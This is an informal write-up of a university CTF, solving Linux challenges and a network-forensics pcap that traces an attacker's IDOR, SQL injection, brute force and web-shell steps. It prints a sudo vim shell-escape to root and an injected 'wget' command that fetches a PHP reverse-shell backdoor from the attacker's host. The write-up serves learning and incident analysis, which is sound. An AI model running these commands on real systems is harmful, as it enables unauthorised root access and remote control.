HackMDHello hackers, today I wanted to share with some write-up from UDOM X-MASS CTF which was organize by my fellow mentors here at at our university, the CTF was a 24 hrs(jeopady style and easy) CTF which was conducted from 22/12/2023 to 23/12/2023. So lets solve the CTF.
Let the hack begin and lets enjoy the struggle
flag format: UDOM{xxxxxxxxxxxxxx}
PART 1: LINUX
we got two challenges
1. CHALLENGE 1 (Secure Shell)
as you can see below the challenge needs us to login via ssh and grab the user.txt file but we got a username and password but hashed so first task we need to crack the hash(piece of cake)
hash:1da233e7b6e0fe081e0a383e98b5b758ad0f3f4c9471d980796745fafc67beab6f8e5761e26d5e73699f39bf96ee156e
cracking this was very simple just copy the hash online (google and google will tell what to do simple as that)
password(plaintext):un1qu3m3
now we gonna try to regin via ssh
flag:UDOM{n07_alwa7s_3asy_as_1t_s33ms_SHA-384:un1qu3m3}
2. CHALLENGE 2( Privilege Escalation )
Time for privilege esclation,with this you were even not required to use much energy just GITFOBINS was enough here to solve it
first of all with sudo -l you will observe some cool information here if it prompts you the password then u have to input the password we got earlier
From the above we can see that first of all they are using a docker container to host this machine and there docker id (c1dd26ec86c2) really fun here lets skip the docker coz its not part of this CTF, the other thing which is most interesting is (/usr/bin/vim) binary.
Explanation:We all know that vim is text editor in unix now what comes into play here is that this binary have allow us to run as a superuser with sudo without droping elevated privilege
we can prove this by
command: ls -la /usr/bin/vim
The most important here is argument (-c for execute <command> really fun men)
And from here we can try to check /bin/bash if has got a root permission before we execute via vim
Generally the exploitation could look like this in order to get root access here.
command: sudo vim -c '!/bin/sh'
FLAG: UDOM{Y0u'r3_n0w_g01ng_7o_B3_th3_M4st3r_0f_h4ck1ng_mach1n35}
BONUS
NB: since we saw that sudo can also run vim we can try to open a file(anyfile nane of your choise) with vim but we attach it with sudo
i.e sudo vim memes_for_fun
And inside the file you can input anything and before we save the file we execute the command "!/bin/bash" and we get root
i.e
NB:Don't claim u have to understand how things flow and how thing work,hapy hacking
PART 2: NETWORK FORENSIC
This challenge were simple but interesting because you need to solve one challenge to unlock the other challenge up to the finally challenge(total of 13 challenges)
NB: the idea behind this challenge is most for blue teamers whom are responsible for monitoring other activities so i really enjoyed here
1. CHALLENGE (IP)
i have already download the file and unzip it so lets check for the flag
If you check from the statistics you will observer that the the flag is
UDOM{192.168.1.7_192.168.1.5}
2. CHALLENGE 2 (Domain)
lets go back to our pcap file, lets and lets input the "http" as a filter on the filter tab
After that i searched for the info that contains 200 OK status code and click follow tcp stream
and at the top of the http headers we get a Host:nanomate-solutions.com
flag: UDOM{nanomate-solutions.com}
3. CHALLENGE 3 (vulnerability)
The main aim was to find the type of attack that the attacker managed to exploit, so lets search via the pcap file
NB: since we are give hint, so we got somewhere were we can begin our investigation about how we can inverstige the type of vulnerability the attacker managed to exploit here.
hint was "The page process_task_details.php had two vulnerabilities that were exploitable… What are they In their short form??"
now we need to go the wireshark as usuall and input "http" as filters and search string "process_task_details.php" what this does is that it is going to grep the response from the server with this string type
And from there we can click the first option and and follow tcp stream
While keep viewing the stream i saw the id was changing probably this could be IDOR vulnerability and i keep looking forward
Also i saw XSS but this one, i think he was testing via the id paramter to see if he can exaploit bad thing is that it didnt work
And also i finally saw SQLI injection due to the input the attacker submited (') and the response he got from the server (internal server error) which worked here
flag: UDOM{IDOR_SQLi}
4. CHALLENGE 4 (IDOR)
IDOR stands for insecure direct object reference where the attacker can just change the ID parameter and see other people's information without.
Here we need to check upon the id parameter and see what id gave us this results
Upon looking one after another id i came accross this id paramater number 8 which gave the results as he requested
flag: UDOM{8}
5. CHALLENGE 5 (SQLi)
Since because we know that the attacker mananeg to exploit SQLi and IDOR lets see how did he managed to exploit SQLi
What the first thing that the attacker did was first trying the the sql injection if is availabe by using (') and which worked for him
he got an internal error from here he decide to use SQLmap tool to automate the sql injection attack so upon keep streaming i saw this one
so from here we we get our flag
flag: UDOM{sqlmap/1.6.10#stable}
6. CHALLENGE 6 (payload)
with this challenge we need to find what payload worked for attacker and how did he manage to get the admin(root) credentials
NB: you know sqlmap is a very interesting tool, with experience, since he request for admin or root creds so we need to find the payload that contains something like admin whether is a username or database or column name, but what i know it must have something like admin.
Now we get the payload, but its encoded lets decode i will use cyber chef here
flag:UDOM{11…FROM nanomate_solutions_db.admin– -}
7. CHALLENGE 7
we need to find the type of attack and also we need to find the email and password the attacker managed to use via login as normal user here.
Upon moving around after finding manye invalid login attempt i realized that maybe the attacker was brute forcing the login page
And if we take a close look at the creds are being encode in some way we can either decode the with some tool or egnore them by remove them manual.
FLAG:UDOM{Brute_Force_Attack_tareq@gmail.com_tareq@nanomate}
8. CHALLENGE 8(root)
This challenge needs us to recall how did the attacker manage to use sql injection payload to retrieve the root or admin creds from task 6.
at the bottom we get some information about root email
location:Bangladesh
email:root@nanomate-solutions.com
password_hash:41528ac7f116e9661cf57be7cd79e1a2
FLAG:UDOM{root@nanomate-solutions.com_41528ac7f116e9661cf57be7cd79e1a2}
9. CHALLENGE 9 (Crack)
since because we got the hash, we need to crack it. lets use online simple tools.
hash:41528ac7f116e9661cf57be7cd79e1a2
password:y0u_cR4cK3d_m3
FLAG: UDOM{y0u_cR4cK3d_m3}
10. CHALLENGE 10 (database)
from the description we see the challenge says database but the flag sats (flag_you_found), which means there is a database named flag lets go and get it
FLAG: UDOM{Dev3L0peR_sH0uLD_n3veR_TrusT_uSer_InPuT}
11. CHALLENGE 8 (reverse shell)
NB: The hint was enough to get this challenge flag and enough to solve the rest of the challenge that remains
The first thing i did i went to wireshark and then search and then strings(terminal.php)
Now after the attacker identify the vulnerable parameter(cmd), allowed him to run commands so if you check below you will realize that the attacker runned ls command
And the results or output can be found here at the bottom were we can see that the command got excuted successfull
After identifying that, what the attacker now tryied to do is that he tried to check how can he get a reverse shell(via bash,wget,python,python3 and so on), so he started with bash command but didnt work and from there he went and try to test what python version could the server is using also didnt work for him, he used which command tp do that and he tried to enject the python3 backdoor but didn't work so he tried to download the rev.php which is the php backdoor from his machine or computer using wget command and then if i was me up to this point i should have know were to trigger the rev.php so as i can get a shell back to my computer
Now we can take our flag and decode with cyberchef
FLAG: UDOM{cmd=wget http://192.168.1.7:8000/rev.php}
12. CHALLENGE 12 (priv Escalation)
This challenge was very very easy to solve because you just need to find where the attacker trigged his reverse shell(rev.php) and what he did for footholding to access root really very easy.
FLAG:UDOM{sudo vim -c ':!/bin/sh'}
- CHALLENGE 13(flag)
And another easy challenge was this one just free flag men
So with challenge you just need to scroll at the bottom and see what the attacker did and if you closer you will find the flag 
FLAG: UDOM{Y0u_NaILeD_IT_HaCkEr}
NB: THIS WRITE-UP AM GOING TO UPDATE DAY AFTER DAY TO COVER ALL CHALLENGES WHEN I GET BORED SO YOU WILL FIND UPDATE HERE ENJOY IT
